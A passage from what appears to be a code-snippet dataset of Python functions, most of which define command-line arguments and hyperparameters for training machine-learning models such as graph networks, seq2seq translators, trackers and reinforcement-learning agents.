Afterwards, learning rate decreases exponentially'\n 'from max_lr to final_lr.')\n parser.add_argument('--lr', type=float, default=1e-4,\n help='Learning rate')\n parser.add_argument('--num_workers', type=int, default=5,\n help='Number of workers to use in dataloader')\n parser.add_argument('--no_shuffle', action='store_true', default=False,\n help='Whether or not to retain default ordering during training')\n parser.add_argument('--shuffle_pairs', action='store_true', default=False,\n help='Whether or not to shuffle only pairs of stereoisomers')\n\n # Model arguments\n parser.add_argument('--gnn_type', type=str,\n choices=['gin', 'gcn', 'dmpnn', 'orig_dmpnn'],\n help='Type of gnn to use')\n parser.add_argument('--global_chiral_features', action='store_true', default=False,\n help='Use global chiral atom features')\n parser.add_argument('--chiral_features', action='store_true', default=False,\n help='Use local chiral atom features')\n parser.add_argument('--ft_boost', action='store_true', default=False, help='whether to concatenate R/S features after each MP layer')\n parser.add_argument('--hidden_size', type=int, default=32,\n help='Dimensionality of hidden layers')\n parser.add_argument('--depth', type=int, default=2,\n help='Number of message passing steps')\n parser.add_argument('--dropout', type=float, default=0.,\n help='Dropout probability')\n parser.add_argument('--graph_pool', type=str, default='sum',\n choices=['sum', 'mean', 'max', 'attn', 'set2set'],\n help='How to aggregate atom representations to molecule representation')\n parser.add_argument('--message', type=str, default='sum',\n choices=['sum', 'tetra_pd', 'tetra_permute', 'tetra_permute_concat'],\n help='How to pass neighbor messages')\n parser.add_argument('--n_layers', type=int, default=2,\n help='Number of final FFN layers')\n parser.add_argument('--skip_coef', type=float, default=1.,\n help='How much information retained in skip connections')\n\n # Attention arguments\n parser.add_argument('--attn_type', type=str, default='gat', choices=['gat', 'tang'],\n help='Attention type. 
GAT or that used in Tang 2020')\n parser.add_argument('--gat_act', type=str, default='leakyrelu',\n choices=['leakyrelu', 'relu'], help='Activation function used in GAT')\n parser.add_argument('--alpha', type=float, default=0.01,\n help='Alpha used in leakyReLU in GAT')\n parser.add_argument('--gat_depth', type=int, default=2,\n help='number of GAT attention layers')\n parser.add_argument('--heads', type=int, default=3,\n help='Number of attention heads')\n parser.add_argument('--attn_dropout', type=float, default=0.,\n help='Dropout probability for attention')\n parser.add_argument('--concat', action='store_true', default=False,\n help='concatenate heads or take average in multihead attention')", "def add_train_args(parser):\n parser.register('type', 'bool', str2bool)\n # Runtime environment\n runtime = parser.add_argument_group('Environment')\n runtime.add_argument('--no-cuda', type='bool', default=False,\n help='Train on CPU, even if GPUs are available.')\n runtime.add_argument('--gpu', type=int, default=-1,\n help='Run on a specific GPU')\n runtime.add_argument('--data-workers', type=int, default=5,\n help='Number of subprocesses for data loading')\n runtime.add_argument('--random-seed', type=int, default=1013,\n help=('Random seed for all numpy/torch/cuda '\n 'operations (for reproducibility)'))\n runtime.add_argument('--num-epochs', type=int, default=40,\n help='Train data iterations')\n runtime.add_argument('--batch-size', type=int, default=32,\n help='Batch size for training')\n runtime.add_argument('--dev-batch-size', type=int, default=16,\n help='Batch size for training')\n\n # Files\n files = parser.add_argument_group('Filesystem')\n files.add_argument('--model-dir', type=str, default=MODEL_DIR,\n help='Directory for saved models/checkpoints/logs')\n files.add_argument('--model-name', type=str, default='',\n help='Unique model identifier (.mdl, .txt, .checkpoint)')\n files.add_argument('--data-dir', type=str, default=DATA_DIR,\n help='Directory of training/validation data')\n files.add_argument('--train-file', type=str,\n default='train_processed.jsonl',\n help='Preprocessed train file')\n files.add_argument('--dev-file', type=str,\n default='dev_processed.jsonl',\n help='Preprocessed dev file')\n files.add_argument('--embed-dir', type=str, default=EMBED_DIR,\n help='Directory of pre-trained embedding files')\n files.add_argument('--embedding-file', type=str,\n default='glove.840B.300d.txt',\n help='Space-separated pretrained embeddings file')\n\n # Saving + loading\n save_load = parser.add_argument_group('Saving/Loading')\n save_load.add_argument('--checkpoint', type='bool', default=False,\n help='Save model + optimizer state after each epoch')\n save_load.add_argument('--pretrained', type=str, default='',\n help='Path to a pretrained model to warm-start with')\n\n # General\n general = parser.add_argument_group('General')\n general.add_argument('--display-iter', type=int, default=25,\n help='Log state after every <display_iter> epochs')\n general.add_argument('--display-samples', type='bool', default=True,\n help='Display top 5 samples in validation process.')\n general.add_argument('--sort-by-len', type='bool', default=True,\n help='Sort batches by length for speed')\n \n # Model architecture\n model = parser.add_argument_group('Model Architecture')\n model.add_argument('--decoder-type', type=str, default='copy',\n help='Decoder architecture type')\n model.add_argument('--vocab-limit', type=int, default=-1,\n help='Limit for vocab creation')\n 
model.add_argument('--use-extended-vocab', type='bool', default=True,\n help='Use extended vocab for copying')\n model.add_argument('--embedding-dim', type=int, default=300,\n help='Embedding size if embedding_file is not given')\n model.add_argument('--hidden-size', type=int, default=128,\n help='Hidden size of RNN units')\n model.add_argument('--rnn-type', type=str, default='lstm',\n help='RNN type: LSTM, GRU, or RNN')\n\n # Optimization details\n optim = parser.add_argument_group('Optimization')\n optim.add_argument('--optimizer', type=str, default='adam',\n help='Optimizer: sgd or adam')\n optim.add_argument('--learning-rate', type=float, default=0.1,\n help='Learning rate')\n optim.add_argument('--weight-decay', type=float, default=0,\n help='Weight decay factor')\n optim.add_argument('--momentum', type=float, default=0,\n help='Momentum factor')\n optim.add_argument('--fix-embeddings', type='bool', default=True,\n help='Keep word embeddings fixed (use pretrained)')\n optim.add_argument('--rnn-padding', type='bool', default=False,\n help='Explicitly account for padding in RNN encoding')\n optim.add_argument('--max-length', type=int, default=30,\n help='The max span allowed during decoding')", "def get_train_args():\n d_train = cfg.get_train_args_schema().fields\n \n if num_local_gpus == 0:\n d_train['num_gpus'] = fields.Int(missing=0,\n description= 'Number of GPUs to train on \\\n (one node only). If set to zero, CPU is used.',\n required= False\n )\n else:\n num_gpus = [0]\n for i in range(num_local_gpus): num_gpus.append(str(i+1))\n d_train['num_gpus'] = fields.Int(missing=1,\n description= 'Number of GPUs to train on \\\n (one node only). If set to zero, \\\n CPU is used.',\n enum = num_gpus,\n required= False\n )\n\n # dictionary sorted by key, \n # https://docs.python.org/3.6/library/collections.html#ordereddict-examples-and-recipes\n train_args = OrderedDict(sorted(d_train.items(), key=lambda t: t[0]))\n\n return train_args", "def train_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('data_dir', type = str, help = 'Path to the data directory') \n parser.add_argument('--lr', type = float, default = 0.001, help = 'Learning rate (0.001)') \n parser.add_argument('--model', type = str, default = 'vgg16', help = 'TorchVision VGG model used: vgg19 or (vgg16)') \n parser.add_argument('--hidden', type = int, default = 4096, help = 'Number of hidden units (4096)') \n parser.add_argument('--epochs', type = int, default = 8, help = 'Number of training epochs (8)') \n parser.add_argument('--gpu', type = bool, default = True, help = '(True) = GPU enabled, False = GPU disabled') \n parser.add_argument('--chk', type = str, default = 'checkpoint', help = 'Checkpoint folder name') \n return parser.parse_args()", "def required_parameters(self):\n return ['seed', 'run_params']", "def add_args(parser):\n # fmt: off\n parser.add_argument('data', help='colon separated path to data directories list, \\\n will be iterated upon during epochs in round-robin manner')\n parser.add_argument('-s', '--source-lang', default=None, metavar='SRC',\n help='source language')\n parser.add_argument('-t', '--target-lang', default=None, metavar='TARGET',\n help='target language')\n parser.add_argument('--lazy-load', action='store_true',\n help='load the dataset lazily')\n parser.add_argument('--raw-text', action='store_true',\n help='load raw text dataset')\n parser.add_argument('--left-pad-source', default='True', type=str, metavar='BOOL',\n help='pad the 
source on the left')\n parser.add_argument('--left-pad-target', default='False', type=str, metavar='BOOL',\n help='pad the target on the left')\n parser.add_argument('--max-source-positions', default=1024, type=int, metavar='N',\n help='max number of tokens in the source sequence')\n parser.add_argument('--max-target-positions', default=1024, type=int, metavar='N',\n help='max number of tokens in the target sequence')\n parser.add_argument('--upsample-primary', default=1, type=int,\n help='amount to upsample primary dataset')\n # fmt: on\n parser.add_argument('--main-src-wordfreq', default=None, type=str,\n help='word frequency file of the main train source')\n parser.add_argument('--dialect-src-wordfreq', default=None, type=str,\n help='word frequency file of the dialect train source')\n parser.add_argument('--dialect-tau', default=1., type=float)\n parser.add_argument('--src-gradnorm-tau', default=1., type=float)\n parser.add_argument('--lm-path', default=None, type=str)\n parser.add_argument('--lm-dict-path', default=None, type=str)\n parser.add_argument('--lm-topk', default=0, type=int)\n parser.add_argument('--src-gradnorm-path', default=None, type=str)\n parser.add_argument('--src-gradnorm-nosoftmax', action='store_true')\n parser.add_argument('--exclude-self', action='store_true')", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def parse_train_args() -> Namespace:\n parser = ArgumentParser()\n add_train_args(parser)\n args = parser.parse_args()\n modify_train_args(args)\n\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"--train_set\", type=str, default=\"drill\",\n help=\"Number of classes to predict (including background).\")\n args = parser.parse_args()\n train_set = args.train_set\n\n #test_set = \"drill_11_test_scenes\"\n\n NUM_CLASSES = 8\n SAVE_DIR = './testing_softmax_output/'\n DATA_DIR = '/'\n DATA_LIST_PATH = '/home/peteflo/spartan/src/CorlDev/experiments/sixobjects_multi_test_scenes.txt.imglist.txtdownsampled10.txt'\n DATA_DIRECTORY = ''\n IGNORE_LABEL = 255\n RESTORE_FROM = './snapshots_' + train_set + '/model.ckpt-20000'\n \n parser.add_argument(\"--num-classes\", type=int, default=NUM_CLASSES,\n help=\"Number of classes to predict (including background).\")\n parser.add_argument(\"--save-dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n parser.add_argument(\"--data-list\", type=str, default=DATA_LIST_PATH,\n help=\"Path to the file listing the images in the dataset.\")\n parser.add_argument(\"--data-dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the PASCAL VOC dataset.\")\n parser.add_argument(\"--ignore-label\", type=int, default=IGNORE_LABEL,\n help=\"The index of the label to ignore during the training.\")\n parser.add_argument(\"--restore-from\", type=str, default=RESTORE_FROM,\n help=\"Where restore model parameters from.\")\n return parser.parse_args()", "def args():\n\n parser = argparse.ArgumentParser(description=\"Train a maximum entropy model.\")\n parser.add_argument(\"-N\", \"--ngram\", metavar=\"N\", dest=\"ngram\", type=int, default=3, help=\"The length of ngram to be considered (default 3).\")\n parser.add_argument(\"datafile\", type=str,\n 
help=\"The file name containing the features.\")\n parser.add_argument(\"modelfile\", type=str,\n help=\"The name of the file to which you write the trained model.\")\n args = parser.parse_args()\n\n return args.datafile, args.ngram, args.modelfile", "def set_training_parameters(\n self,\n config: ConfigDict,\n len_train: int,\n len_test: int,\n ):\n self.configure_steps(config, len_train, len_test)\n self.configure_reporting(config)\n self.configure_training_functions(config)", "def load_arguments(parser):\n\n\t# paths\n\tparser.add_argument('--train_path_src', type=str, required=True, help='train src dir')\n\tparser.add_argument('--train_path_tgt', type=str, required=True, help='train tgt dir')\n\tparser.add_argument('--path_vocab_src', type=str, required=True, help='vocab src dir')\n\tparser.add_argument('--path_vocab_tgt', type=str, required=True, help='vocab tgt dir')\n\tparser.add_argument('--dev_path_src', type=str, default=None, help='dev src dir')\n\tparser.add_argument('--dev_path_tgt', type=str, default=None, help='dev tgt dir')\n\tparser.add_argument('--save', type=str, required=True, help='model save dir')\n\tparser.add_argument('--load', type=str, default=None, help='model load dir')\n\tparser.add_argument('--load_embedding_src', type=str, default=None, help='pretrained src embedding')\n\tparser.add_argument('--load_embedding_tgt', type=str, default=None, help='pretrained tgt embedding')\n\tparser.add_argument('--train_attscore_path', type=str, default=None, help='train set reference attention scores')\n\tparser.add_argument('--dev_attscore_path', type=str, default=None, help='dev set reference attention scores')\n\n\t# model\n\tparser.add_argument('--embedding_size_enc', type=int, default=200, help='encoder embedding size')\n\tparser.add_argument('--embedding_size_dec', type=int, default=200, help='decoder embedding size')\n\tparser.add_argument('--hidden_size_enc', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_bilstm_enc', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--num_unilstm_enc', type=int, default=0, help='number of encoder unilstm layers')\n\tparser.add_argument('--hidden_size_dec', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_unilstm_dec', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--hard_att', type=str, default='False', help='use hard attention or not')\n\tparser.add_argument('--att_mode', type=str, default='bahdanau', \\\n\t\t\t\t\t\t\thelp='attention mechanism mode - bahdanau / hybrid / dot_prod')\t\n\tparser.add_argument('--hidden_size_att', type=int, default=1, \\\n\t\t\t\t\t\t\thelp='hidden size for bahdanau / hybrid attention')\n\tparser.add_argument('--hidden_size_shared', type=int, default=200, \\\n\t\t\t\t\t\t\thelp='transformed att output hidden size (set as hidden_size_enc)')\n\tparser.add_argument('--additional_key_size', type=int, default=0, \\\n\t\t\t\t\t\t\thelp='additional attention key size: keys = [values, add_feats]')\n\n\t# train \n\tparser.add_argument('--random_seed', type=int, default=666, help='random seed')\t\n\tparser.add_argument('--max_seq_len', type=int, default=32, help='maximum sequence length')\n\tparser.add_argument('--batch_size', type=int, default=64, help='batch size')\t\n\tparser.add_argument('--embedding_dropout', type=float, default=0.0, help='embedding dropout')\n\tparser.add_argument('--dropout', type=float, default=0.0, 
help='dropout')\n\tparser.add_argument('--num_epochs', type=int, default=10, help='number of training epoches')\n\tparser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate')\n\tparser.add_argument('--residual', type=str, default='False', help='residual connection')\n\tparser.add_argument('--max_grad_norm', type=float, default=1.0, help='optimiser gradient norm clipping: max grad norm')\t\n\tparser.add_argument('--batch_first', type=str, default='True', help='batch as the first dimension')\n\tparser.add_argument('--use_gpu', type=str, default='False', help='whether or not using GPU')\n\tparser.add_argument('--eval_with_mask', type=str, default='True', help='calc loss excluding padded words')\n\tparser.add_argument('--scheduled_sampling', type=str, default='False', \\\n\t\t\t\t\t \t\thelp='gradually turn off teacher forcing \\\n\t\t\t\t\t \t\t(if True, use teacher_forcing_ratio as the starting point)')\n\n\t# teacher forcing / attention forcing / dual\n\tparser.add_argument('--train_mode', type=str, default='dual', help='train mode; multi | dual | afdynamic')\n\tparser.add_argument('--load_tf', type=str, default=None, help='used with train_mode=af; tf model load dir')\n\tparser.add_argument('--teacher_forcing_ratio', type=float, default=1.0, help='ratio of teacher forcing')\n\tparser.add_argument('--attention_forcing', type=str, default='False', help='whether or not using attention forcing')\n\tparser.add_argument('--attention_loss_coeff', type=float, default=1.0, \\\n\t\t\t\t\t\t\thelp='attention loss coeff, ignored if attention_forcing=False')\n\t\n\t# save and print\n\tparser.add_argument('--checkpoint_every', type=int, default=10, help='save ckpt every n steps')\t\n\tparser.add_argument('--print_every', type=int, default=10, help='print every n steps')\t\n\n\treturn parser", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def define_parameters(self):", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. 
\"\n # \"Zip format\",\n # required=False)", "def __init__(self, epsilon=0.05,gamma=0.8,alpha=0.2, numTraining=0, **args):\n args['epsilon'] = epsilon\n args['gamma'] = gamma\n args['alpha'] = alpha\n args['numTraining'] = numTraining\n QLearningAgent.__init__(self, **args)", "def __init__(self, *args, **kwargs):\n self.classes = [0,1] # (default to 0/1; replace during training)\n self.theta = np.array([]) # placeholder value before training\n\n if len(args) or len(kwargs): # if we were given optional arguments,\n self.train(*args,**kwargs) # just pass them through to \"train\"", "def training_config_parser():\n parser = argparse.ArgumentParser()\n\n # xml_annotation_path, csv_annotation_path, oxford_annotations_path, oxford_images_path\n # Dataset info\n parser.add_argument(\n \"--xml_annotation_path\", type=str, required=True\n )\n parser.add_argument(\n \"--csv_annotation_path\", type=str, required=True\n )\n parser.add_argument(\n \"--oxford_annotations_path\", type=str, required=True\n )\n parser.add_argument(\n \"--oxford_images_path\", type=str, required=True\n )\n \n parser.add_argument(\n \"--background_class\",\n type=int,\n required=False,\n default=0,\n help=\"Default background class\",\n )\n\n # What to train\n parser.add_argument(\n \"--train_backbone\",\n action=\"store_true\",\n required=False,\n default=False,\n help=\"Train backbone\",\n )\n parser.add_argument(\n \"--train_transformers\",\n action=\"store_true\",\n required=False,\n default=False,\n help=\"Train transformers\",\n )\n parser.add_argument(\n \"--train_nlayers\",\n action=\"store_true\",\n required=False,\n default=False,\n help=\"Train new layers\",\n )\n\n # How to train\n parser.add_argument(\n \"--finetuning\",\n default=False,\n required=False,\n action=\"store_true\",\n help=\"Load the model weight before to train\",\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n required=False,\n default=1,\n help=\"Batch size to use to train the model\",\n )\n parser.add_argument(\n \"--gradient_norm_clipping\",\n type=float,\n required=False,\n default=0.1,\n help=\"Gradient norm clipping\",\n )\n parser.add_argument(\n \"--target_batch\",\n type=int,\n required=False,\n default=None,\n help=\"When running on a single GPU, aggretate the gradient before to apply.\",\n )\n\n # Learning rate\n parser.add_argument(\n \"--backbone_lr\", type=bool, required=False, default=1e-5, help=\"Train backbone\"\n )\n parser.add_argument(\n \"--transformers_lr\",\n type=bool,\n required=False,\n default=1e-4,\n help=\"Train transformers\",\n )\n parser.add_argument(\n \"--nlayers_lr\", type=bool, required=False, default=1e-4, help=\"Train new layers\"\n )\n\n return parser", "def add_args(parser):\n parser.add_argument(\"data\", metavar=\"FILE\", help=\"file prefix for data\")\n parser.add_argument(\n \"--num-classes0\",\n type=int,\n default=-1,\n help=\"number of classes0\",\n )\n parser.add_argument(\"--no-shuffle\", action=\"store_true\", default=False)", "def __init__(self, *args, **kwargs):\n # Initializing the test & training set\n self._x_train = kwargs['X_train']\n self._y_train = kwargs['Y_train']\n self._x_test = kwargs['X_test']\n self._y_test = kwargs['Y_test']\n\n self.num_iteration = kwargs['num_iteration']\n self.learning_rate = kwargs['learning_rate']", "def setup_args():\n parser = ParlaiParser()\n parser.add_argument(\n '-n',\n '--num-episodes',\n default=-1,\n type=int,\n help='Total number of episodes to convert, -1 to convert all examples',\n )\n parser.add_argument(\n '-of',\n '--outfile',\n 
default=None,\n type=str,\n help='Output file where to save, by default will be created in /tmp',\n )\n parser.add_argument(\n '-s1id', '--speaker-0-id', type=str, help='Speaker id of agent who speaks first'\n )\n parser.add_argument(\n '-s1id',\n '--speaker-1-id',\n type=str,\n help='Speaker id of agent who speaks second',\n )\n parser.add_argument(\n '--prepended-context',\n type='bool',\n default=False,\n help='specify if the context is prepended to the first act',\n )\n parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)\n parser.set_defaults(datatype='train:ordered')\n\n return parser", "def pre_build_args(self, args):\n args = super(SubtitlesTrainer, self).pre_build_args(args)\n # Set up method specific model and training args\n if args.method in ['b-skip', 'f-skip', 'b-mask', 'f-mask']:\n # No direct connection from features to z in encoder\n args.model_args['feat_to_z'] = True\n # Do not add unimodal ELBO training loss for RNN methods\n args.train_args['uni_loss'] = True\n return args", "def default_training_params():\n N_EPOCHS = 100\n BATCH_SIZE = 64\n EPSILON = 0.0001\n return N_EPOCHS, BATCH_SIZE, EPSILON", "def parse_args(self):\n\n dict_args = dict()\n dict_args['hid'] = 64 # size of each hidden layer\n dict_args['l'] = 2 # number of layers\n\n dict_args['seed'] = 0 # Discard as this will cause identical results for PLA\n dict_args['cpu'] = 4 # MPI\n dict_args['exp_name'] = 'ppo'\n\n dict_args['epochs'] = 1000\n dict_args['steps_per_epoch'] = 25 # default 4000\n dict_args['pi_lr'] = 3e-4\n dict_args['vf_lr'] = 1e-3\n dict_args['train_pi_iters'] = 5 # default 80\n dict_args['train_v_iters'] = 5 # default 80\n dict_args['max_ep_len'] = 25 # default 1000, this needs to be the same as steps_per_epoch for Unity environment\n dict_args['target_kl'] = 0.01\n dict_args['clip_ratio'] = 0.2\n dict_args['lam'] = 0.97\n dict_args['gamma'] = 0.99\n dict_args['save_freq'] = 10\n dict_args['ac_kwargs'] = dict(hidden_sizes=[dict_args['hid']]*dict_args['l'])\n return dict_args", "def add_generic_args(parser):\n parser.add_argument(\n \"--config_file\", type=str, help=\"path to config file for model\", required=True\n )\n parser.add_argument(\n \"--checkpoint_folder\",\n default=\"\",\n type=str,\n help=\"\"\"folder to use for saving checkpoints:\n epochal checkpoints are stored as model_<epoch>.torch,\n latest epoch checkpoint is at checkpoint.torch\"\"\",\n )\n parser.add_argument(\n \"--checkpoint_load_path\",\n default=\"\",\n type=str,\n help=\"\"\"path to load a checkpoint from, which can be a file or a directory:\n If the path is a directory, the checkpoint file is assumed to be\n checkpoint.torch\"\"\",\n )\n parser.add_argument(\n \"--pretrained_checkpoint_path\",\n default=\"\",\n type=str,\n help=\"\"\"path to load a pre-trained checkpoints from, which can be a file or a\n directory:\n If the path is a directory, the checkpoint file is assumed to be\n checkpoint.torch. 
This checkpoint is only used for fine-tuning\n tasks, and training will not resume from this checkpoint.\"\"\",\n )\n parser.add_argument(\n \"--checkpoint_period\",\n default=1,\n type=int,\n help=\"\"\"Checkpoint every x phases (default 1)\"\"\",\n )\n parser.add_argument(\n \"--show_progress\",\n default=False,\n action=\"store_true\",\n help=\"shows progress bar during training / testing\",\n )\n parser.add_argument(\n \"--skip_tensorboard\",\n default=False,\n action=\"store_true\",\n help=\"do not perform tensorboard visualization\",\n )\n parser.add_argument(\n \"--visdom_server\",\n default=\"\",\n type=str,\n help=\"visdom server to use (default None)\",\n )\n parser.add_argument(\n \"--visdom_port\",\n default=8097,\n type=int,\n help=\"port of visdom server (default = 8097)\",\n )\n parser.add_argument(\n \"--profiler\",\n default=False,\n action=\"store_true\",\n help=\"specify this argument to profile training code\",\n )\n parser.add_argument(\n \"--debug\",\n default=False,\n action=\"store_true\",\n help=\"specify this argument for debugging mode\",\n )\n parser.add_argument(\n \"--ignore_checkpoint_config\",\n default=False,\n action=\"store_true\",\n help=\"\"\"specify this argument to ignore\n the compatibility of the config (or lack of config) attached\n to the checkpoint; this will allow mismatches between\n the training specified in the config and the\n actual training of the model\"\"\",\n )\n parser.add_argument(\n \"--log_freq\",\n default=5,\n type=int,\n help=\"Logging frequency for LossLrMeterLoggingHook (default 5)\",\n )\n parser.add_argument(\n \"--image_backend\",\n default=\"PIL\",\n type=str,\n help=\"torchvision image decoder backend (PIL or accimage). Default PIL\",\n )\n parser.add_argument(\n \"--video_backend\",\n default=\"pyav\",\n type=str,\n help=\"torchvision video decoder backend (pyav or video_reader). Default pyav\",\n )\n parser.add_argument(\n \"--distributed_backend\",\n default=\"none\",\n type=str,\n help=\"\"\"Distributed backend: either 'none' (for non-distributed runs)\n or 'ddp' (for distributed runs). Default none.\"\"\",\n )\n\n return parser", "def training_opts(self):\n return self._training_opts", "def parse_args(mode=None):\n parser = ArgumentParser()\n if mode == \"train\":\n parser.add_train_arguments()\n elif mode == \"trainval\":\n parser.add_train_val_arguments()\n elif mode == \"val\":\n parser.add_val_arguments()\n elif mode == \"test\":\n parser.add_test_arguments()\n else:\n raise ValueError(\n \"build_argparser received incorrect mode.\"\n \" Possible modes: ('train', 'trainval', 'val', 'test').\"\n )\n return vars(parser.parse_args())", "def add_args(parser):\n rescore_add_args(parser)\n parser.add_argument(\n \"--rl-weight\",\n type=float,\n default=0.1,\n help=\"trade-off coefficient of rl loss\",\n )\n parser.add_argument(\n \"--rl-num-trajectory\",\n type=int,\n default=3,\n help=\"num trajectory in rl training\",\n )", "def Args(parser):\n # TODO(user): move all flags definition to api_lib/ml/flags.py.\n parser.add_argument('job', help='Name of the batch prediction job.')\n parser.add_argument('--model', required=True, help='Name of the model.')\n parser.add_argument(\n '--version',\n help='Model version to be used. 
If unspecified, the default version '\n 'of the model will be used.')\n # input location is a repeated field.\n parser.add_argument(\n '--input-paths',\n type=arg_parsers.ArgList(min_length=1),\n required=True,\n help='Google Cloud Storage paths to the instances to run prediction on.'\n ' Wildcards accepted. Multiple paths can be specified if more than one '\n 'file patterns are needed. Example: '\n 'gs://my-bucket-0/instances0,gs://my-bucket-1/instances1')\n parser.add_argument(\n '--data-format',\n required=True,\n choices=['TEXT', 'TF_RECORD'],\n help='Data format of the input files.')\n parser.add_argument(\n '--output-path', required=True,\n help='Google Cloud Storage path to which to save the output. '\n 'Example: gs://my-bucket/output.')\n parser.add_argument(\n '--region',\n required=True,\n help='The Google Compute Engine region to run the job in.')", "def define_parameters(self):\n\n self.add_argument('--input1',dest='input1',type=str,optional=False,\n help='What file do you want to upload?')\n self.add_argument('--input2',dest='input2',type=str,optional=False,\n help='What file do you want to upload?')", "def get_args():\r\n\r\n ap = argparse.ArgumentParser(add_help=False,\r\n description='Arguments for training Goturn Tracker')\r\n ap.add_argument('--npus', type=int, default=1,\r\n help='number of npus, 0: means no npu, -1 to use all \\\r\n npus, 1 = use one npu, 2 = use two npus')\r\n ap.add_argument('--device', type=int, default=0, help='which npu to train')\r\n # Data settings\r\n ap.add_argument('--imagenet_path', type=str,\r\n required=True, help='path to imagenet folder, this \\\r\n folder shoud have images and gt folder')\r\n ap.add_argument('--alov_path', type=str,\r\n required=True, help='path to ALOV folder, this \\\r\n folder should have images and gt folder')\r\n\r\n # architecture and hyperparameters\r\n ap.add_argument('--arch', default='alexnet',\r\n choices={'alexnet'}, help='model architecture, \\\r\n default: alexnet, currently only alexnet is \\\r\n supported')\r\n ap.add_argument('--pretrained_model',\r\n default='../goturn/models/pretrained/alexnet.pth.tar',\r\n help='Path to pretrained model')\r\n ap.add_argument('--epochs', default=90,\r\n type=int, help='number of total epochs to run')\r\n ap.add_argument('--batch_size', default=3,\r\n type=int, help='number of images per batch')\r\n ap.add_argument('--max_steps', default=None,\r\n type=int, help='number of total steps to run')\r\n\r\n # Optimizer settings\r\n ap.add_argument('--lr', default=1e-6, type=float,\r\n help='initial learning rate', dest='lr')\r\n ap.add_argument('--momentum', default=0.9, type=float, help='momentum')\r\n ap.add_argument('--wd', default=5e-4, type=float, help='weight decay (default: 5e-4)',\r\n dest='wd')\r\n ap.add_argument('--lr_step', default=1, type=int,\r\n help='Number of epoch after which we change the learning rate',\r\n dest='lr_step')\r\n ap.add_argument('--gamma', default=0.1, type=float,\r\n help='multiplicative factor for learning rate',\r\n dest='gamma')\r\n\r\n # reproducibility\r\n ap.add_argument('--seed', type=int, default=42, help='seed value')\r\n # ap.add_argument('--seed', type=int, default=800, help='seed value')\r\n\r\n # save path\r\n ap.add_argument('--save_path', default=\".\", type=str, help='path to save output')\r\n\r\n # goturn specific arguments\r\n ap = GoturnTrain.add_model_specific_args(ap)\r\n return ap.parse_args()", "def load_args():\n parser = argparse.ArgumentParser(description=\"Classify and predict digits using the mnist dataset\")\n 
parser.add_argument('mode', help='the mode to run in: fit, model or predict')\n parser.add_argument('--algo', help='which algorithm to use: RandomForest, KNN')\n return parser.parse_args()", "def configure_args(self):\n super(InstaApriori, self).configure_args()\n self.add_passthru_arg('-iteration', type=int, help=\"The current iteration. Not used as a command line argument\")\n self.add_passthru_arg('--k', type=int, default=3, help=\"Specify the maximum size of itemsets to find\")\n self.add_passthru_arg('--s', type=float, help=\"Specify the minimum support threshold\")\n self.add_passthru_arg('--c', type=float, default=0, help=\"Specify the minimum confidence threshold\")\n self.add_file_arg('--f', default='frequent.txt',\n help=\"Specify the name of the file used to store frequent itemsets\")", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def fixture_wrapper_arguments():\n n_features = 9\n classes = [\"a\", \"b\", \"c\"]\n\n return n_features, classes", "def parse_args():\n parser = common.default_args(net_name=NET_NAME, \n num_classes=21, image_size=IMAGE_SIZE)\n parser.add_argument('--trained-model', required=False, help='Path to trained state_dict file', \n default=TRAINED_MODEL_PATH)\n return parser.parse_args()", "def setup(args):\n cfg = get_cfg()\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # customize reszied parameters\n # cfg['INPUT']['MIN_SIZE_TRAIN'] = (20,)\n # cfg['INPUT']['MAX_SIZE_TRAIN'] = 50\n cfg.freeze()\n default_setup(\n cfg, args\n ) # if you don't like any of the default setup, write your own setup code\n return cfg", "def get_train_args():\n parser = argparse.ArgumentParser('Train a Text Summarization Model')\n\n # parser.add_argument('--hiddenDim', nargs='?', type=int, default=50, help='The size of the hidden dimension to be used for all layers')\n parser.add_argument('--hiddenDim', type=int, default=50, help='The size of the hidden dimension to be used for all layers')\n parser.add_argument('--numLayers', type=int, default=2, help='The number of LSTM layers')\n parser.add_argument('--batchSize', type=int, default=16, help='The batch size')\n parser.add_argument('--numEpochs', type=int, default=10, help='The number of epochs to train for')\n parser.add_argument('--lr', type=float, default=1e-3, help='The learning rate')\n parser.add_argument('--dropout', type=float, default=0.0, help='Dropout rate')\n parser.add_argument('--seed', type=int, default=0, help='To seed the random state for repeatability')\n parser.add_argument('--printEveryIters', type=int, default=250, help='To print/log after this many iterations')\n parser.add_argument('--tbDescr', type=str, default='', help='Experiment description for tensorboard logging')\n parser.add_argument('--savedModelDir', default=None, help='Location for saving model checkpoints during training')\n parser.add_argument('--loadBestModel', type=str2bool, 